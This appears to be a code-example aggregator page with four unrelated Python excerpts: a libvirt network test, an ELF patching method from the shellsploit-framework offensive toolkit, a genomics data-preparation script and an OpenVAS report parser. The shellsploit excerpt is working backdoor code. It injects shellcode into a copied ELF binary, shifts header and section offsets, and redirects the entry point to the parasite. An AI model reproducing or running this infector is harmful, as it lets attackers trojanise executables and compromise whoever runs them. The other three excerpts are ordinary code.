        if pxe_boot:
            prepare_pxe_boot()
        # Edit the network xml or create a new one.
        if create_network:
            net_ifs = utils_net.get_net_if(state="UP")
            # Check forward device is valid or not,
            # if it's not in host interface list, try to set
            # forward device to first active interface of host
            forward = ast.literal_eval(params.get("net_forward",
                                                  "{}"))
            if (forward.has_key('mode') and forward['mode'] in
                ['passthrough', 'private', 'bridge', 'macvtap'] and
                forward.has_key('dev') and
                    forward['dev'] not in net_ifs):
                logging.warn("Forward device %s is not a interface"
                             " of host, reset to %s",
                             forward['dev'], net_ifs[0])
                forward['dev'] = net_ifs[0]
                params["net_forward"] = str(forward)
            forward_iface = params.get("forward_iface")
            if forward_iface:
                interface = [x for x in forward_iface.split()]
                # The guest will use first interface of the list,
                # check if it's valid or not, if it's not in host
                # interface list, try to set forward interface to
                # first active interface of host.
                if interface[0] not in net_ifs:
                    logging.warn("Forward interface %s is not a "
                                 " interface of host, reset to %s",
                                 interface[0], net_ifs[0])
                    interface[0] = net_ifs[0]
                    params["forward_iface"] = " ".join(interface)

            netxml = libvirt.create_net_xml(net_name, params)
            try:
                netxml.sync()
            except xcepts.LibvirtXMLError, details:
                logging.info(str(details))
                if define_error:
                    pass
                else:
                    raise error.TestFail("Failed to define network")
        # Edit the interface xml.
        if change_iface_option:
            modify_iface_xml()
        # Attach interface if needed
        if attach_iface:
            iface_type = params.get("iface_type", "network")
            iface_model = params.get("iface_model", "virtio")
            for i in range(int(iface_num)):
                logging.info("Try to attach interface loop %s" % i)
                options = ("%s %s --model %s --config" %
                           (iface_type, net_name, iface_model))
                ret = virsh.attach_interface(vm_name, options,
                                             ignore_status=True)
                if ret.exit_status:
                    logging.error("Command output %s" %
                                  ret.stdout.strip())
                    raise error.TestFail("Failed to attach-interface")

        if multiple_guests:
            # Clone more vms for testing
            for i in range(int(multiple_guests)):
                guest_name = "%s_%s" % (vm_name, i)
                timeout = params.get("clone_timeout", 360)
                utils_libguestfs.virt_clone_cmd(vm_name, guest_name,
                                                True, timeout=timeout)
                vms_list.append(vm.clone(guest_name))

        if test_bridge:
            bridge = ast.literal_eval(net_bridge)
            br_if = utils_net.Interface(bridge['name'])
            if not br_if.is_up():
                raise error.TestFail("Bridge interface isn't up")
        if test_dnsmasq:
            # Check the settings in dnsmasq config file
            if net_dns_forward == "no":
                run_dnsmasq_default_test("domain-needed")
                run_dnsmasq_default_test("local", "//")
            if net_domain:
                run_dnsmasq_default_test("domain", net_domain)
                run_dnsmasq_default_test("expand-hosts")
            if net_bridge:
                bridge = ast.literal_eval(net_bridge)
                run_dnsmasq_default_test("interface", bridge['name'])
                if bridge.has_key('stp') and bridge['stp'] == 'on':
                    if bridge.has_key('delay'):
                        br_delay = float(bridge['delay'])
                        cmd = ("brctl showstp %s | grep 'bridge forward delay'"
                               % bridge['name'])
                        out = utils.run(cmd, ignore_status=False).stdout.strip()
                        logging.debug("brctl showstp output: %s", out)
                        pattern = (r"\s*forward delay\s+(\d+.\d+)\s+bridge"
                                   " forward delay\s+(\d+.\d+)")
                        match_obj = re.search(pattern, out, re.M)
                        if not match_obj or len(match_obj.groups()) != 2:
                            raise error.TestFail("Can't see forward delay"
                                                 " messages from command")
                        elif (float(match_obj.groups()[0]) != br_delay or
                                float(match_obj.groups()[1]) != br_delay):
                            raise error.TestFail("Foward delay setting"
                                                 " can't take effect")
            if dhcp_start_ipv4 and dhcp_end_ipv4:
                run_dnsmasq_default_test("dhcp-range", "%s,%s"
                                         % (dhcp_start_ipv4, dhcp_end_ipv4))
            if guest_name and guest_ipv4:
                run_dnsmasq_host_test(iface_mac, guest_ipv4, guest_name)

        if test_dns_host:
            if net_dns_txt:
                dns_txt = ast.literal_eval(net_dns_txt)
                run_dnsmasq_default_test("txt-record", "%s,%s" %
                                         (dns_txt["name"],
                                          dns_txt["value"]))
            if net_dns_srv:
                dns_srv = ast.literal_eval(net_dns_srv)
                run_dnsmasq_default_test("srv-host", "_%s._%s.%s,%s,%s,%s,%s" %
                                         (dns_srv["service"], dns_srv["protocol"],
                                          dns_srv["domain"], dns_srv["target"],
                                          dns_srv["port"], dns_srv["priority"],
                                          dns_srv["weight"]))
            if net_dns_hostip and net_dns_hostnames:
                run_dnsmasq_addnhosts_test(net_dns_hostip, net_dns_hostnames)

        # Run bandwidth test for network
        if test_qos_bandwidth:
            run_bandwidth_test(check_net=True)
        # Check routes if needed
        if routes:
            check_host_routes()

        try:
            # Start the VM.
            vm.start()
            if start_error:
                raise error.TestFail("VM started unexpectedly")
            if pxe_boot:
                # Just check network boot messages here
                vm.serial_console.read_until_output_matches(
                    ["Loading vmlinuz", "Loading initrd.img"],
                    utils_misc.strip_console_codes)
                output = vm.serial_console.get_stripped_output()
                logging.debug("Boot messages: %s", output)

            else:
                if serial_login:
                    session = vm.wait_for_serial_login(username=username,
                                                       password=password)
                else:
                    session = vm.wait_for_login()

                if test_dhcp_range:
                    dhcp_range = int(params.get("dhcp_range", "252"))
                    utils_net.restart_guest_network(session, iface_mac)
                    vm_ip = utils_net.get_guest_ip_addr(session, iface_mac)
                    logging.debug("Guest has ip: %s", vm_ip)
                    if not vm_ip and dhcp_range:
                        raise error.TestFail("Guest has invalid ip address")
                    elif vm_ip and not dhcp_range:
                        raise error.TestFail("Guest has ip address: %s"
                                             % vm_ip)
                    dhcp_range = dhcp_range - 1
                    for vms in vms_list:
                        # Start other VMs.
                        vms.start()
                        sess = vms.wait_for_serial_login()
                        vms_mac = vms.get_virsh_mac_address()
                        # restart guest network to get ip addr
                        utils_net.restart_guest_network(sess, vms_mac)
                        vms_ip = utils_net.get_guest_ip_addr(sess,
                                                             vms_mac)
                        if not vms_ip and dhcp_range:
                            raise error.TestFail("Guest has invalid ip address")
                        elif vms_ip and not dhcp_range:
                            # Get IP address on guest should return Null
                            # if it exceeds the dhcp range
                            raise error.TestFail("Guest has ip address: %s"
                                                 % vms_ip)
                        dhcp_range = dhcp_range - 1
                        if vms_ip:
                            ping_s, _ = ping(dest=vm_ip, count=5,
                                             timeout=10, session=sess)
                            if ping_s:
                                raise error.TestFail("Failed to ping, src: %s, "
                                                     "dst: %s" % (vms_ip, vm_ip))
                        sess.close()

                # Check dnsmasq settings if take affect in guest
                if guest_ipv4:
                    check_name_ip(session)

                # Run bandwidth test for interface
                if test_qos_bandwidth:
                    run_bandwidth_test(check_iface=True)
                # Run bandwidth test for portgroup
                if test_pg_bandwidth:
                    pg_bandwidth_inbound = params.get(
                        "portgroup_bandwidth_inbound", "").split()
                    pg_bandwidth_outbound = params.get(
                        "portgroup_bandwidth_outbound", "").split()
                    pg_name = params.get("portgroup_name", "").split()
                    pg_default = params.get("portgroup_default", "").split()
                    iface_inbound = ast.literal_eval(iface_bandwidth_inbound)
                    iface_outbound = ast.literal_eval(iface_bandwidth_outbound)
                    iface_name = libvirt.get_ifname_host(vm_name, iface_mac)
                    if_source = ast.literal_eval(iface_source)
                    if if_source.has_key("portgroup"):
                        pg = if_source["portgroup"]
                    else:
                        pg = "default"
                    for (name, df, bw_ib, bw_ob) in zip(pg_name, pg_default,
                                                        pg_bandwidth_inbound,
                                                        pg_bandwidth_outbound):
                        if pg == name:
                            inbound = ast.literal_eval(bw_ib)
                            outbound = ast.literal_eval(bw_ob)
                        elif pg == "default" and df == "yes":
                            inbound = ast.literal_eval(bw_ib)
                            outbound = ast.literal_eval(bw_ob)
                        else:
                            continue
                        # Interface bandwidth settings will
                        # overwriting portgroup settings
                        if iface_inbound:
                            inbound = iface_inbound
                        if iface_outbound:
                            outbound = iface_outbound
                        check_class_rules(iface_name, "1:1", inbound)
                        check_filter_rules(iface_name, outbound)
                if test_qos_remove:
                    # Remove the bandwidth settings in network xml
                    logging.debug("Removing network bandwidth settings...")
                    netxml_backup.sync()
                    vm.destroy(gracefully=False)
                    # Should fail to start vm
                    vm.start()
                    if restart_error:
                        raise error.TestFail("VM started unexpectedly")
                if test_ipv6_address:
                    check_ipt_rules(check_ipv6=True)
                    run_ip_test(session, "ipv6")
                if test_ipv4_address:
                    check_ipt_rules(check_ipv4=True)
                    run_ip_test(session, "ipv4")

                if test_guest_libvirt:
                    run_guest_libvirt(session)

                session.close()
        except virt_vm.VMStartError as details:
            logging.info(str(details))
            if not (start_error or restart_error):
                raise error.TestFail('VM failed to start:\n%s' % details)

    finally:
        # Recover VM.
        if vm.is_alive():
            vm.destroy(gracefully=False)
        for vms in vms_list:
            virsh.remove_domain(vms.name, "--remove-all-storage")
        logging.info("Restoring network...")
        if net_name == "default":
            netxml_backup.sync()
        else:
            # Destroy and undefine new created network
            virsh.net_destroy(net_name)
            virsh.net_undefine(net_name)
        vmxml_backup.sync()

Example 120

Project: shellsploit-framework
Source File: elfbin.py
View license
    def patch_elf(self):
        '''
        Circa 1998: http://vxheavens.com/lib/vsc01.html  <--Thanks to elfmaster
        6. Increase p_shoff by PAGE_SIZE in the ELF header
        7. Patch the insertion code (parasite) to jump to the entry point (original)
        1. Locate the text segment program header
            -Modify the entry point of the ELF header to point to the new code (p_vaddr + p_filesz)
            -Increase p_filesz by account for the new code (parasite)
            -Increase p_memsz to account for the new code (parasite)
        2. For each phdr who's segment is after the insertion (text segment)
            -increase p_offset by PAGE_SIZE
        3. For the last shdr in the text segment
            -increase sh_len by the parasite length
        4. For each shdr who's section resides after the insertion
            -Increase sh_offset by PAGE_SIZE
        5. Physically insert the new code (parasite) and pad to PAGE_SIZE,
            into the file - text segment p_offset + p_filesz (original)
        '''

        self.support_check()
        if self.supported is False:
            print "[!] ELF Binary not supported"
            return False

        self.output_options()

        if not os.path.exists("backdoored"):
            os.makedirs("backdoored")
        os_name = os.name
        if os_name == 'nt':
            self.backdoorfile = "backdoored\\" + self.OUTPUT
        else:
            self.backdoorfile = "backdoored/" + self.OUTPUT

        shutil.copy2(self.FILE, self.backdoorfile)


        gather_result = self.gather_file_info()
        if gather_result is False:
            print "[!] Are you fuzzing?"
            return False

        print "[*] Getting shellcode length"

        resultShell = self.set_shells()
        if resultShell is False:
            print "[!] Could not set shell"
            return False
        self.bin_file = open(self.backdoorfile, "r+b")

        newBuffer = len(self.shellcode)

        self.bin_file.seek(24, 0)

        headerTracker = 0x0
        PAGE_SIZE = 4096
        newOffset = None
        #find range of the first PT_LOAD section
        for header, values in self.prog_hdr.iteritems():
            #print 'program header', header, values
            if values['p_flags'] == 0x5 and values['p_type'] == 0x1:
                #print "Found text segment"
                self.shellcode_vaddr = values['p_vaddr'] + values['p_filesz']
                beginOfSegment = values['p_vaddr']
                oldentry = self.e_entry
                sizeOfNewSegment = values['p_memsz'] + newBuffer
                LOCofNewSegment = values['p_filesz'] + newBuffer
                headerTracker = header
                newOffset = values['p_offset'] + values['p_filesz']

        #now that we have the shellcode startpoint, reassgin shellcode,
        #  there is no change in size
        print "[*] Setting selected shellcode"

        resultShell = self.set_shells()

        #SPLIT THE FILE
        self.bin_file.seek(0)
        if newOffset > 4294967296 or newOffset is None:
            print "[!] Fuzz Fuzz Fuzz the bin"
            return False
        if newOffset > self.file_size:
            print "[!] The file is really not that big"
            return False

        file_1st_part = self.bin_file.read(newOffset)
        #print file_1st_part.encode('hex')
        newSectionOffset = self.bin_file.tell()
        file_2nd_part = self.bin_file.read()

        self.bin_file.close()
        #print "Reopen file for adjustments"
        self.bin_file = open(self.backdoorfile, "w+b")
        self.bin_file.write(file_1st_part)
        self.bin_file.write(self.shellcode)
        self.bin_file.write("\x00" * (PAGE_SIZE - len(self.shellcode)))
        self.bin_file.write(file_2nd_part)
        if self.EI_CLASS == 0x01:
            #32 bit FILE
            #update section header table
            print "[*] Patching x86 Binary"
            self.bin_file.seek(24, 0)
            self.bin_file.seek(8, 1)
            if self.e_shoff + PAGE_SIZE > 4294967296:
                print "[!] Such fuzz..."
                return False
            self.bin_file.write(struct.pack(self.endian + "I", self.e_shoff + PAGE_SIZE))
            self.bin_file.seek(self.e_shoff + PAGE_SIZE, 0)
            for i in range(self.e_shnum):
                #print "i", i, self.sec_hdr[i]['sh_offset'], newOffset
                if self.sec_hdr[i]['sh_offset'] >= newOffset:
                    #print "Adding page size"
                    if self.sec_hdr[i]['sh_offset'] + PAGE_SIZE > 4294967296:
                        print "[!] Melkor is cool right?"
                        return False
                    self.bin_file.seek(16, 1)
                    self.bin_file.write(struct.pack(self.endian + "I", self.sec_hdr[i]['sh_offset'] + PAGE_SIZE))
                    self.bin_file.seek(20, 1)
                elif self.sec_hdr[i]['sh_size'] + self.sec_hdr[i]['sh_addr'] == self.shellcode_vaddr:
                    #print "adding newBuffer size"
                    if self.sec_hdr[i]['sh_offset'] + newBuffer > 4294967296:
                        print "[!] Someone is fuzzing..."
                        return False
                    self.bin_file.seek(20, 1)
                    self.bin_file.write(struct.pack(self.endian + "I", self.sec_hdr[i]['sh_size'] + newBuffer))
                    self.bin_file.seek(16, 1)
                else:
                    self.bin_file.seek(40, 1)
            #update the pointer to the section header table
            after_textSegment = False
            self.bin_file.seek(self.e_phoff, 0)
            for i in range(self.e_phnum):
                #print "header range i", i
                #print "self.shellcode_vaddr", hex(self.prog_hdr[i]['p_vaddr']), hex(self.shellcode_vaddr)
                if i == headerTracker:
                    #print "Found Text Segment again"
                    after_textSegment = True
                    self.bin_file.seek(16, 1)

                    if self.prog_hdr[i]['p_filesz'] + newBuffer > 4294967296:
                        print "[!] Melkor you fuzzer you..."
                        return False
                    if self.prog_hdr[i]['p_memsz'] + newBuffer > 4294967296:
                        print "[!] Someone is a fuzzing..."
                        return False
                    self.bin_file.write(struct.pack(self.endian + "I", self.prog_hdr[i]['p_filesz'] + newBuffer))
                    self.bin_file.write(struct.pack(self.endian + "I", self.prog_hdr[i]['p_memsz'] + newBuffer))
                    self.bin_file.seek(8, 1)
                elif after_textSegment is True:
                    #print "Increasing headers after the addition"
                    self.bin_file.seek(4, 1)
                    if self.prog_hdr[i]['p_offset'] + PAGE_SIZE > 4294967296:
                        print "[!] Nice Fuzzer!"
                        return False
                    self.bin_file.write(struct.pack(self.endian + "I", self.prog_hdr[i]['p_offset'] + PAGE_SIZE))
                    self.bin_file.seek(24, 1)
                else:
                    self.bin_file.seek(32, 1)

            self.bin_file.seek(self.e_entryLocOnDisk, 0)
            if self.shellcode_vaddr >= 4294967295:
                print "[!] Oh hai Fuzzer!"
                return False
            self.bin_file.write(struct.pack(self.endian + "I", self.shellcode_vaddr))

            self.JMPtoCodeAddress = self.shellcode_vaddr - self.e_entry - 5

        else:
            #64 bit FILE
            print "[*] Patching x64 Binary"
            self.bin_file.seek(24, 0)
            self.bin_file.seek(16, 1)
            if self.e_shoff + PAGE_SIZE > 0x7fffffffffffffff:
                print "[!] Such fuzz..."
                return False
            self.bin_file.write(struct.pack(self.endian + "I", self.e_shoff + PAGE_SIZE))
            self.bin_file.seek(self.e_shoff + PAGE_SIZE, 0)
            for i in range(self.e_shnum):
                #print "i", i, self.sec_hdr[i]['sh_offset'], newOffset
                if self.sec_hdr[i]['sh_offset'] >= newOffset:
                    #print "Adding page size"
                    self.bin_file.seek(24, 1)
                    if self.sec_hdr[i]['sh_offset'] + PAGE_SIZE > 0x7fffffffffffffff:
                        print "[!] Fuzzing..."
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.sec_hdr[i]['sh_offset'] + PAGE_SIZE))
                    self.bin_file.seek(32, 1)
                elif self.sec_hdr[i]['sh_size'] + self.sec_hdr[i]['sh_addr'] == self.shellcode_vaddr:
                    #print "adding newBuffer size"
                    self.bin_file.seek(32, 1)
                    if self.sec_hdr[i]['sh_offset'] + newBuffer > 0x7fffffffffffffff:
                        print "[!] Melkor is cool right?"
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.sec_hdr[i]['sh_size'] + newBuffer))
                    self.bin_file.seek(24, 1)
                else:
                    self.bin_file.seek(64, 1)
            #update the pointer to the section header table
            after_textSegment = False
            self.bin_file.seek(self.e_phoff, 0)
            for i in range(self.e_phnum):
                #print "header range i", i
                #print "self.shellcode_vaddr", hex(self.prog_hdr[i]['p_vaddr']), hex(self.shellcode_vaddr)
                if i == headerTracker:
                    #print "Found Text Segment again"
                    after_textSegment = True
                    self.bin_file.seek(32, 1)
                    if self.prog_hdr[i]['p_filesz'] + newBuffer > 0x7fffffffffffffff:
                        print "[!] Fuzz fuzz fuzz... "
                        return False
                    if self.prog_hdr[i]['p_memsz'] + newBuffer > 0x7fffffffffffffff:
                        print "[!] Someone is fuzzing..."
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.prog_hdr[i]['p_filesz'] + newBuffer))
                    self.bin_file.write(struct.pack(self.endian + "Q", self.prog_hdr[i]['p_memsz'] + newBuffer))
                    self.bin_file.seek(8, 1)
                elif after_textSegment is True:
                    #print "Increasing headers after the addition"
                    self.bin_file.seek(8, 1)
                    if self.prog_hdr[i]['p_offset'] + PAGE_SIZE > 0x7fffffffffffffff:
                        print "[!] Nice fuzzer!"
                        return False
                    self.bin_file.write(struct.pack(self.endian + "Q", self.prog_hdr[i]['p_offset'] + PAGE_SIZE))
                    self.bin_file.seek(40, 1)
                else:
                    self.bin_file.seek(56, 1)

            self.bin_file.seek(self.e_entryLocOnDisk, 0)
            if self.shellcode_vaddr > 0x7fffffffffffffff:
                print "[!] Fuzzing..."
                return False
            self.bin_file.write(struct.pack(self.endian + "Q", self.shellcode_vaddr))

            self.JMPtoCodeAddress = self.shellcode_vaddr - self.e_entry - 5

        self.bin_file.close()
        print "[!] Patching Complete"
        return True

Example 121

Project: FIDDLE
Source File: data4trainng.py
View license
def main():
    usage = 'usage: %prog [options] <assembly> <annotation_file> <out_file>'
    parser = OptionParser(usage)
    parser.add_option('-d', dest='rootDir', type='str', default='.', help='Root directory of the project [Default: %default]')
    parser.add_option('-b', dest='chunkSize', default=1000, type='int', help='Align sizes with batch size')
    parser.add_option('-e', dest='width', type='int', default=500, help='Extend all sequences to this length [Default: %default]')
    parser.add_option('-r', dest='stride', default=20, type='int', help='Stride sequences [Default: %default]')

    (options,args) = parser.parse_args()

    if len(args) !=3 :
        print(args)
        print(options)
        print(len(args))
        parser.error('Must provide assembly, annotation file and an output name')
    else:
        assembly = args[0]
        annot_file = args[1]
        out_file = args[2]

    # read in the annotation file
    annot = pd.read_table(annot_file,sep=',')

    # Make directory for the project
    directory = "../../data/hdf5datasets/"
    if not os.path.exists(directory):
        os.makedirs(directory)

    # Parameters
    x1 = 500  #upstream
    x2 = 500  #downstream

    # open the hdf5 file to write
    f = h5py.File(os.path.join(directory,out_file), "w")
    trainSize = np.floor(0.90*len(annot)*(x1+x2-options.width)/options.stride)
    testSize = np.floor(0.05*len(annot)*(x1+x2-options.width)/options.stride)
    # make sure that the sizes are integer multiple of chunk size
    trainSize -= (trainSize % options.chunkSize)
    testSize -= (testSize % options.chunkSize)
    trainSize = int(trainSize)
    testSize = int(testSize)
    print >> sys.stderr, '%d training sequences\n %d test sequences ' % (trainSize,testSize)

    # note that we have 1 channel and 4xoptions.width matrices for dna sequence.
    NStrainData = f.create_dataset("NStrainInp", (trainSize,2,1,options.width))
    MStrainData = f.create_dataset("MStrainInp", (trainSize,2,1,options.width))
    DStrainData = f.create_dataset("DStrainInp", (trainSize,4,1,options.width))
    RStrainData = f.create_dataset("RStrainInp", (trainSize,1,1,options.width))
    TFtrainData = f.create_dataset("TFtrainInp", (trainSize,2,1,options.width))

    trainTarget = f.create_dataset("trainOut", (trainSize,1,1,options.width))

    # note that we have 1 channel and 4xoptions.width matrices for dna sequence.
    NStestData = f.create_dataset("NStestInp", (testSize,2,1,options.width))
    MStestData = f.create_dataset("MStestInp", (testSize,2,1,options.width))
    DStestData = f.create_dataset("DStestInp", (testSize,4,1,options.width))
    RStestData = f.create_dataset("RStestInp", (testSize,1,1,options.width))
    TFtestData = f.create_dataset("TFtestInp", (testSize,2,1,options.width))

    testTarget = f.create_dataset("testOut", (testSize,1,1,options.width))

    info = f.create_dataset("info", (trainSize+testSize,4)) # chromosome no,  strand, index of the annotation, genomic position

    chrRange = annot['chr'].unique()
    # Use 4 channel and 1xoptions.width
    NSdata = np.zeros([options.chunkSize,2,1,options.width])
    MSdata = np.zeros([options.chunkSize,2,1,options.width])
    DSdata = np.zeros([options.chunkSize,4,1,options.width])
    RSdata = np.zeros([options.chunkSize,1,1,options.width])
    TFdata = np.zeros([options.chunkSize,2,1,options.width])
    target = np.zeros([options.chunkSize,1,1,options.width])

    infodata = np.zeros([options.chunkSize,4])

    qq=0;
    cc=0;
    ps =0;
    nestVar = 0;
    debugMode = True

    # if options.species in ['YJ167','YJ168','YJ169','Scer','YSC001']:
    #     assembly = 'sacCer3'
    # elif options.species in ['YJ160']:
    #     assembly = 'Klla'
    # elif options.species in ['YJ177']:
    #     assembly = 'DeHa2'
    # else:
    #     raise('unknown species')

    print assembly
    gdb = genome.db.GenomeDB(path='/Users/umut/Projects/genome/data/share/genome_db',assembly=assembly)

    NSpos = gdb.open_track('NSpos')
    NSneg = gdb.open_track('NSneg')
    MSpos = gdb.open_track('MSpos')
    MSneg = gdb.open_track('MSneg')
    TFpos = gdb.open_track('TFpos')
    TFneg = gdb.open_track('TFneg')
    RS = gdb.open_track('RS')
    TSpos = gdb.open_track('TSpos')
    TSneg = gdb.open_track('TSneg')
    seq = gdb.open_track("seq")

    for chname in chrRange:
        if nestVar:
                break
        cc +=1
        tf = annot.chr==chname
        print 'doing %s' % (chname)

        for i in range(sum(tf)):
            if nestVar:
                break
            tss = annot[tf].tss.iloc[i]

            if annot[tf].strand.iloc[i]=="-":
                xran = range(tss-x2,tss+x1-options.width,options.stride)
            else:
                if tss<1000:
                    continue
                xran = range(tss-x1,tss+x2-options.width,options.stride)

            annotIdx = annot[tf].index[i]

            for pos in xran:
                if nestVar:
                    break
                seqVec = seq.get_seq_str(chname,pos+1,(pos+options.width))
                dsdata = vectorizeSequence(seqVec.lower())

                nsP = NSpos.get_nparray(chname,pos+1,(pos+options.width))
                nsN = NSneg.get_nparray(chname,pos+1,(pos+options.width))
                msP = MSpos.get_nparray(chname,pos+1,(pos+options.width))
                msN = MSneg.get_nparray(chname,pos+1,(pos+options.width))
                tfP = TFpos.get_nparray(chname,pos+1,(pos+options.width))
                tfN = TFneg.get_nparray(chname,pos+1,(pos+options.width))
                rs = RS.get_nparray(chname,pos+1,(pos+options.width))
                tsP = TSpos.get_nparray(chname,pos+1,(pos+options.width))
                tsN = TSneg.get_nparray(chname,pos+1,(pos+options.width))


                if debugMode:
                    if not checkData(np.r_[nsP,nsN,msP,msN,rs,tsP,tsN,tfP,tfN]):
                        print('NaN detected in chr' + chname + ' and at the position:' + str(pos))
                        # print nsmstsrsdata
                        # nestVar = 1;
                        continue

                if annot[tf].strand.iloc[i]=="+":
                    NSdata[qq,0,0,:] = nsP.T
                    NSdata[qq,1,0,:] = nsN.T
                    MSdata[qq,0,0,:] =msP.T
                    MSdata[qq,1,0,:] = msN.T
                    DSdata[qq,:,0,:] = dsdata.T
                    RSdata[qq,0,0,:] = rs.T
                    TFdata[qq,0,0,:] =tfP.T
                    TFdata[qq,1,0,:] = tfN.T
                    if sum(tsP)==0:
                        tsP = tsP + 1/np.float(options.width)
                    else:
                        tsP = tsP/sum(tsP+1e-5)
                    target[qq,0,0,:] =tsP.T
                    infodata[qq,:] = [cc, 1,annotIdx,pos]
                else:
                    NSdata[qq,0,0,:] = np.flipud(nsN).T
                    NSdata[qq,1,0,:] = np.flipud(nsP).T
                    MSdata[qq,0,0,:] = np.flipud(msN).T
                    MSdata[qq,1,0,:] = np.flipud(msP).T
                    RSdata[qq,0,0,:] = np.flipud(rs).T
                    DSdata[qq,:,0,:] = np.flipud(np.fliplr(dsdata)).T
                    TFdata[qq,0,0,:] = np.flipud(tfN).T
                    TFdata[qq,1,0,:] = np.flipud(tfP).T
                    if sum(tsN)==0:
                        tsN = tsN + 1/np.float(options.width)
                    else:
                        tsN = tsN/sum(tsN+1e-5)
                    target[qq,0,0,:] =np.flipud(tsN).T
                    infodata[qq,:] = [cc, -1,annotIdx,pos]

                qq+=1

                if ((ps+options.chunkSize) <= trainSize) and (qq>=options.chunkSize):
                    stp = options.chunkSize
                    NStrainData[range(ps,ps+stp),:,:,:] = NSdata
                    MStrainData[range(ps,ps+stp),:,:,:] = MSdata
                    DStrainData[range(ps,ps+stp),:,:,:] = DSdata
                    RStrainData[range(ps,ps+stp),:,:,:] = RSdata
                    TFtrainData[range(ps,ps+stp),:,:,:] = TFdata
                    trainTarget[range(ps,ps+stp),:,:,:] = target
                    info[range(ps,ps+stp),:] = infodata
                    NSdata = np.zeros([options.chunkSize,2,1,options.width])
                    MSdata = np.zeros([options.chunkSize,2,1,options.width])
                    DSdata = np.zeros([options.chunkSize,4,1,options.width])
                    RSdata = np.zeros([options.chunkSize,1,1,options.width])
                    infodata = np.zeros([options.chunkSize,4])
                    ps+=stp
                    qq=0
                    print >> sys.stderr, '%d  training chunk saved ' % ps
                if (ps >= trainSize) & (ps < (trainSize + testSize)) and (qq>=options.chunkSize):
                    NStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = NSdata
                    MStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = MSdata
                    DStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = DSdata
                    RStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = RSdata
                    TFtestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = TFdata
                    testTarget[range(ps-trainSize,ps-trainSize+stp),:,:,:] = target
                    info[range(ps,ps+stp),:] = infodata
                    rt = ps-trainSize
                    ps+=stp
                    qq=0
                    print >> sys.stderr, '%d  testing chunk saved ' % rt
                if ps >=(trainSize+testSize):
                    nestVar = 1;
                    break

    print ps
    f.close()
    NSpos.close()
    NSneg.close()
    MSpos.close()
    MSneg.close()
    RS.close()
    TFpos.close()
    TFneg.close()
    TSpos.close()
    TSneg.close()
    seq.close()

Example 122

Project: golismero
Source File: __init__.py
View license
def report_parser(path_or_file, ignore_log_info=True):
	"""
    This functions transform XML OpenVas file report to OpenVASResult object structure.

    To pass StringIO file as parameter, you must do that:
    >>> import StringIO
    >>> xml='<report extension="xml" type="scan" id="aaaa" content_type="text/xml" format_id="a994b278-1f62-11e1-96ac-406186ea4fc5"></report>'
    >>> f=StringIO.StringIO(xml)
    >>> report_parser(f)
    [OpenVASResult]

    To pass a file path:
    >>> xml_path='/home/my_user/openvas_result.xml'
    >>> report_parser(xml_path)
    [OpenVASResult]

    Language specification: http://www.openvas.org/omp-4-0.html

    :param path_or_file: path or file descriptor to xml file.
    :type path_or_file: str | file | StringIO

    :param ignore_log_info: Ignore Threats with Log and Debug info
    :type ignore_log_info: bool

    :raises: etree.ParseError, IOError, TypeError

    :return: list of OpenVASResult structures.
    :rtype: list(OpenVASResult)
    """
	if isinstance(path_or_file, str):
		if not os.path.exists(path_or_file):
			raise IOError("File %s not exits." % path_or_file)
		if not os.path.isfile(path_or_file):
			raise IOError("%s is not a file." % path_or_file)
	else:
		if not getattr(getattr(path_or_file, "__class__", ""), "__name__", "") in ("file", "StringIO", "StringO"):
			raise TypeError("Expected str or file, got '%s' instead" % type(path_or_file))

	# Parse XML file
	try:
		xml_parsed = etree.parse(path_or_file)
	except etree.ParseError:
		raise etree.ParseError("Invalid XML file. Ensure file is correct and all tags are properly closed.")

	# Use this method, because API not exposes real path and if you write isisntance(xml_results, Element)
	# doesn't works
	if type(xml_parsed).__name__ == "Element":
		xml = xml_parsed
	elif type(xml_parsed).__name__ == "ElementTree":
		xml = xml_parsed.getroot()
	else:
		raise TypeError("Expected ElementTree or Element, got '%s' instead" % type(xml_parsed))

	# Check valid xml format
	if "id" not in xml.keys():
		raise ValueError("XML format is not valid, doesn't contains id attribute.")

	# Regex
	port_regex_specific = re.compile("([\w\d\s]*)\(([\d]+)/([\w\W\d]+)\)")
	port_regex_generic = re.compile("([\w\d\s]*)/([\w\W\d]+)")
	cvss_regex = re.compile("(cvss_base_vector=[\s]*)([\w:/]+)")
	vulnerability_IDs = ("cve", "bid", "bugtraq")

	m_return = []
	m_return_append = m_return.append

	# All the results
	for l_results in xml.findall(".//result"):
		l_partial_result = OpenVASResult()

		# Id
		l_vid = None
		try:
			l_vid = l_results.get("id")
			l_partial_result.id = l_vid
		except TypeError as e:
			logging.warning("%s is not a valid vulnerability ID, skipping vulnerability..." % l_vid)
			logging.debug(e)
			continue

		# --------------------------------------------------------------------------
		# Filter invalid vulnerability
		# --------------------------------------------------------------------------
		threat = l_results.find("threat")
		if threat is None:
			logging.warning("Vulnerability %s can't has 'None' as thread value, skipping vulnerability..." % l_vid)
			continue
		else:
			# Valid threat?
			if threat.text not in OpenVASResult.risk_levels:
				logging.warning("%s is not a valid risk level for %s vulnerability. skipping vulnerability..."
				                % (threat.text,
				                   l_vid))
				continue

		# Ignore log/debug messages, only get the results
		if threat.text in ("Log", "Debug") and ignore_log_info is True:
			continue

		# For each result
		for l_val in l_results.getchildren():

			l_tag = l_val.tag

			# --------------------------------------------------------------------------
			# Common properties: subnet, host, threat, raw_description
			# --------------------------------------------------------------------------
			if l_tag in ("subnet", "host", "threat"):
				# All text vars can be processes both.
				try:
					setattr(l_partial_result, l_tag, l_val.text)
				except (TypeError, ValueError) as e:
					logging.warning(
						"%s is not a valid value for %s property in %s vulnerability. skipping vulnerability..."
						% (l_val.text,
						   l_tag,
						   l_partial_result.id))
					logging.debug(e)
					continue

			elif l_tag == "description":
				try:
					setattr(l_partial_result, "raw_description", l_val.text)
				except TypeError as e:
					logging.warning("%s is not a valid description for %s vulnerability. skipping vulnerability..."
					                % (l_val.text,
					                   l_vid))
					logging.debug(e)
					continue

			# --------------------------------------------------------------------------
			# Port
			# --------------------------------------------------------------------------
			elif l_tag == "port":

				# Looking for port as format: https (443/tcp)
